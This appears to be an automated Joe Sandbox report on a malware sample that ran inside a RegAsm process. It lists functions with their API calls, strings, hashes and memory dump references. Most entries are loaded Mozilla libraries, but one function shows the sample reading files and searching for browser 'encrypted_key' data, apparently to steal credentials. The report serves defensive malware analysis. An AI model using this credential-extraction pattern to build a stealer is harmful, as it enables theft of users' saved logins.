API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: ee36fdb8d1175914aab0f95f377823235a5c94acf3932aed88f39ebb6a97efa2
Instruction ID: b5d0a849186a1b351c13b95d84322dc5a33e70e9eb131e4fba0ba4c7f772b1f9
Opcode Fuzzy Hash: ee36fdb8d1175914aab0f95f377823235a5c94acf3932aed88f39ebb6a97efa2
Instruction Fuzzy Hash: 1E719C756043059FCB00DF29C888B9ABBF5FF89724F15857AF85A9B301EB30A944CB91

Function 6C755E60 Relevance: 21.2, APIs: 14, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755E9D

Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4

GetCurrentThreadId.KERNEL32 ref: 6C755EAB
GetCurrentThreadId.KERNEL32 ref: 6C755EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C755ECF
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C756017

Part of subcall function 6C744310: moz_xmalloc.MOZGLUE(00000010,?,6C7442D2), ref: 6C74436A
Part of subcall function 6C744310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7442D2), ref: 6C744387

moz_xmalloc.MOZGLUE(00000004), ref: 6C755F47
GetCurrentProcess.KERNEL32 ref: 6C755F53
GetCurrentThread.KERNEL32 ref: 6C755F5C
GetCurrentProcess.KERNEL32 ref: 6C755F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C755F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C755F27

Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C755E8C

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C75605D
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C78F968), ref: 6C7560CC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID:
API String ID: 3711609982-0
Opcode ID: be5f49f302d8a5140115b20d8af7007c17b3a79458c1fb02f5cb23716d430723
Instruction ID: e84f34966e69ba20ab1a927d71bd3c96b6497819f69e32de012831628fed3dc2
Opcode Fuzzy Hash: be5f49f302d8a5140115b20d8af7007c17b3a79458c1fb02f5cb23716d430723
Instruction Fuzzy Hash: 3D71E4B06047418FD750DF28D584A6ABBF0FF59304F54493DE48A8BB52DB31EA58CB92

Function 6C79D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D52A
GetCurrentThreadId.KERNEL32 ref: 6C79D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D55F
free.MOZGLUE(00000000), ref: 6C79D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C79D5D3
GetCurrentThreadId.KERNEL32 ref: 6C79D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D652
GetCurrentThreadId.KERNEL32 ref: 6C79D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D6A2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 99667f58460a0c249e05e2719a8b1532548c23c7bb68e8e477841de01d1bdef4
Instruction ID: 8d48de99252979f797df25cd4b8fc170e6b7ba301e4291f1679cb0d0fe7c78d6
Opcode Fuzzy Hash: 99667f58460a0c249e05e2719a8b1532548c23c7bb68e8e477841de01d1bdef4
Instruction Fuzzy Hash: 37515B71604706DFC704DF34C988A9ABBB8FF89358F108A2EE85A87711DB30B945CB91

Function 6C85ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C85ACE2
malloc.MOZGLUE(00000001), ref: 6C85ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C85AD02
TlsGetValue.KERNEL32 ref: 6C85AD3C
calloc.MOZGLUE(00000001,?), ref: 6C85AD8C
PR_Unlock.NSS3 ref: 6C85ADC0
free.MOZGLUE(00000000), ref: 6C85AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C85AE58
free.MOZGLUE(00000000), ref: 6C85AE69
free.MOZGLUE(?), ref: 6C85AE78
PR_Unlock.NSS3 ref: 6C85AE8C
free.MOZGLUE(?), ref: 6C85AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C85AEC7

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 85c8371230b1fdec5799801b5490557530aca62009eb77a2464d793344ae1467
Instruction ID: 484387e0be42da059629bdccb403f9f55211246775443bc59ce7bb1bd4e045fe
Opcode Fuzzy Hash: 85c8371230b1fdec5799801b5490557530aca62009eb77a2464d793344ae1467
Instruction Fuzzy Hash: 555191B1B0511A9BDF60EF58CE856FE77B4BB06349F640825D804A3B01D3B1EA24CBE5

Function 6C741E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C741EC1
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C741EE1
EnterCriticalSection.KERNEL32(6C7CE744), ref: 6C741F38
LeaveCriticalSection.KERNEL32(6C7CE744), ref: 6C741F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C741F83
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C741FC0
EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C741FE2
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C741FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C742019

Strings

\|l, xrefs: 6C741F3E
D|l, xrefs: 6C741F56
MOZ_CRASH(), xrefs: 6C742000
D|l, xrefs: 6C741F32

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: D|l$D|l$MOZ_CRASH()$\|l
API String ID: 2055633661-676028859
Opcode ID: ab27acc8eda7b51bc74f676eb47a33a539d7372121700b5ea63e2725c7b5c20d
Instruction ID: a1442dd16db9fecc44cdee7102a8a1c8f11b16787e69a63b79873e9533f81d13
Opcode Fuzzy Hash: ab27acc8eda7b51bc74f676eb47a33a539d7372121700b5ea63e2725c7b5c20d
Instruction Fuzzy Hash: 8F41D371B0131A8FDF109F78C989BAA37B9EB49748F004135F905D7741D771A9248BD6

Function 6C765670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C7656D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7656E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C7656F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C765744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C7657BC
GetTickCount64.KERNEL32 ref: 6C7658CB
EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7658F3
__aulldiv.LIBCMT ref: 6C765945
LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7659B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C7CF638,?,?,?,?), ref: 6C7659E9

Strings

MOZ_APP_RESTART, xrefs: 6C7656CC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 7c35040172e925ff344435924e146efb6fbd511b2d250cd459f20984d584e574
Instruction ID: 1cf5e7c0c0f190e1e28d900697973822453e61dfe3419603d96841892d04808e
Opcode Fuzzy Hash: 7c35040172e925ff344435924e146efb6fbd511b2d250cd459f20984d584e574
Instruction Fuzzy Hash: C5C1AD31A087419FCB05CF28C54066ABBF1FFCA714F058A2DE8C5A7B21D730A985DB82

Function 6C78EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78EC8C

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

GetCurrentThreadId.KERNEL32 ref: 6C78ECA1
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C78ECC5
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C78ED19
CloseHandle.KERNEL32(?), ref: 6C78ED28
free.MOZGLUE(00000000), ref: 6C78ED2F
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C78EC94

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 24e2b840a1b6ea100b95be212067b46ec6d0e9ace00c21cecfa478c12c12768d
Instruction ID: b9f87af33454d368355bafc8a597e9ca5b9eff9dd68833b54c2ecd8e5028995e
Opcode Fuzzy Hash: 24e2b840a1b6ea100b95be212067b46ec6d0e9ace00c21cecfa478c12c12768d
Instruction Fuzzy Hash: C221F77960110AAFDF009F64D90DA9A377DEB4636DF104231FE2897741DB35AA09CBB2

Function 6C7A5FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C7A6009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C7A6024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qtl,?), ref: 6C7A6046
OutputDebugStringA.KERNEL32(?,Qtl,?), ref: 6C7A6061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7A6069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7A6073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7A6082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C7C148E), ref: 6C7A6091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qtl,00000000,?), ref: 6C7A60BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7A60C4

Strings

Qtl, xrefs: 6C7A5FFC, 6C7A6042, 6C7A6045, 6C7A60B3

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: Qtl
API String ID: 3835517998-1532266737
Opcode ID: 581f2014ce43a6c2e36c568a12466e92b8bfea942fb64c2a75192ccc452617db
Instruction ID: 50a8817aa65cf14317c975f0ca029c77b2213329406a821f85ff60674d82c011
Opcode Fuzzy Hash: 581f2014ce43a6c2e36c568a12466e92b8bfea942fb64c2a75192ccc452617db
Instruction Fuzzy Hash: 6021A371A002099FDF205F69DC0DAAA7BB8FF45719F008438F85A97640CB74A659CFE1

Function 6C753A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6C753BB4
ReleaseSRWLockShared.KERNEL32 ref: 6C753BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6C753BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6C753C91
ReleaseSRWLockShared.KERNEL32 ref: 6C753CBD
moz_xmalloc.MOZGLUE ref: 6C753CF1

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: c9f3049ddd3ec319be19734196d31224b992bd83af8a362dee5fe12e01a6b2a7
Instruction ID: 2b7557f5d27f15b19916860620fa90daf7f090f87c49601a344ddca8944ee561
Opcode Fuzzy Hash: c9f3049ddd3ec319be19734196d31224b992bd83af8a362dee5fe12e01a6b2a7
Instruction Fuzzy Hash: B3C18EB1A04741CFC714DF29C28465ABBF5FF89304F55866ED8998BB21DB30E895CB82

Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415845
_memset.LIBCMT ref: 00415856

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 0041596A
GlobalFree.KERNEL32(?), ref: 00415A8C

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415A18
StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
lstrcatA.KERNEL32(?,?), ref: 00415A54
lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction ID: 4905153569d8748fa83d0ede9c9d82dcbc9816826170d9825a589ea8a61000d7
Opcode Fuzzy Hash: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction Fuzzy Hash: F8713DB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E908A3250EA369FA58F55

Function 6C7E4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D97
PR_Lock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DBA
PR_WaitCondVar.NSS3 ref: 6C7E4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DEF

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 5a49046040d51dc359521aeea3889fe3896f21a2624ef821fb5242059a1c70a2
Instruction ID: 406595b9269dfe7d769dcdd874d4555d82811ec441d87c72ae2eda06ff6dbcfe
Opcode Fuzzy Hash: 5a49046040d51dc359521aeea3889fe3896f21a2624ef821fb5242059a1c70a2
Instruction Fuzzy Hash: 7F4182B2A08715CFDB00EFB8D6885697BF4BF0A318F154669DC889B710E730E994CB95

Function 6C788ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C74EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?), ref: 6C7891F4

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Strings

timeline-overview, xrefs: 6C78907A
timeline-fileio, xrefs: 6C7890A4
data, xrefs: 6C7890E8
timeline-ipc, xrefs: 6C789096
stack-chart, xrefs: 6C7890B2
marker-chart, xrefs: 6C78905E
name, xrefs: 6C788F16
marker-table, xrefs: 6C78906C
timeline-memory, xrefs: 6C789088

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

